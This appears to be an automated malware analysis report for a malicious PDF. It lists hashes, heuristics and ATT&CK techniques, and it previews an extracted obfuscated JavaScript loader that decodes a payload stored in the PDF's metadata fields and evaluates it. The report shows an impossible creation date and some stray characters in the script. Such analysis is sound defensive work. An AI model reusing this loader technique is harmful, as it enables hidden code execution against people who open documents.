Malicious PDF — malware analysis report

Static analysis result for SHA-256 77cabcd9d14d6006…

MALICIOUS

PDF

761 B Created: 2011-72-51 03:25:00 Authoring application: t9.5*w,t4.t5*w,t8.5*w,8*w,t4.5*w,t6.5*w,t8.75*w,t5.75*w,15.t5*w,9.75*w,9.t5*w,t9.t5*w,14.t5*w,1t*w
MD5: 7cf503250e6ff3a22f779c3939aa19ed SHA-1: 90bb067c2d6ccd95de13040f7e9c4a6acc88f6e4 SHA-256: 77cabcd9d14d6006a787a94a94bf93aea635720eb63f8ab4d7cf02d2aac4c4a4
114 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that is obfuscated but appears to leverage String.fromCharCode and potentially exploits a known PDF vulnerability cluster. The script's intent is to execute arbitrary code, likely to download and run a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js
8798c666c5cdfadeb90a5ac5b936355b7ae0011ed7a16e5251a59b998bb0a24c		 pdf-javascript-stream PDF /JS object 1 at offset 0xFC 311 bytes
Preview script
First 1,000 lines of the extracted script
var w = 4;
var ivcsw = this.producer;
var skidw=function(){return {e:this}}().e;
vwunh=skidw[this.subject];
kxoeq=vwunh(this.title);
ivcsw = ivcsw.replace(/t/g,'2');
aaecj = vwunh('['+ivcsw+']');
var s = '';
for (i = 0; i < aaecj.length; i++) {
.eqjbf = aaecj[i];
.s += kxoeq(eqjbf);
}
vwunh(s);

Open this report in the interactive analyzer, or submit your own file for analysis.